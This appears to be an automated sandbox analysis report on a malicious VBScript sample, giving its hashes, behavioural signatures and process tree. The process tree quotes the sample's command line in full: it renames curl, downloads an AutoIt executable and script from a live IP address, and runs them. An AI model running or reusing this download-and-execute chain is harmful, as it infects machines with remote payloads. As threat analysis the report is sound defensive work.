Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
27/09/2023, 14:31
Static task
static1
Behavioral task
behavioral1
Sample
ByI.vbs
Resource
win7-20230831-en
4 signatures
150 seconds
General
-
Target
ByI.vbs
-
Size
14KB
-
MD5
1bac3ba2e3941dea6a6541961be54e80
-
SHA1
5991e6f26e7c302708a4be73ffd56bca636009fc
-
SHA256
643c85416ff830ae12c09960d837f39e2605cab1dc4dbdcf5de3ea383b5e27cc
-
SHA512
38cf48e0a9b1521067b7f199b57996d0e434fe355b39492d5e3c594dae15769040624922f1cc94630475dd71e815514b47cddfc02e336673ec7b8649e771317a
-
SSDEEP
24:6v/AE+kto64KBiHDmDHCWkqalW95VuF9/ITLBLdhXdHxjszxo+0Qg0:cn+kxJQyDHVxaM3cfI3RftuVvn
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3020 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3020 wrote to memory of 820 3020 WScript.exe 29 PID 3020 wrote to memory of 820 3020 WScript.exe 29 PID 3020 wrote to memory of 820 3020 WScript.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ByI.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\wlgt & cd /d c:\wlgt & copy c:\windows\system32\curl.exe wlgt.exe & wlgt -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & wlgt -o yyjraq.au3 http://94.228.169.143:2351/msiwlgtucnm & Autoit3.exe yyjraq.au32⤵PID:820
-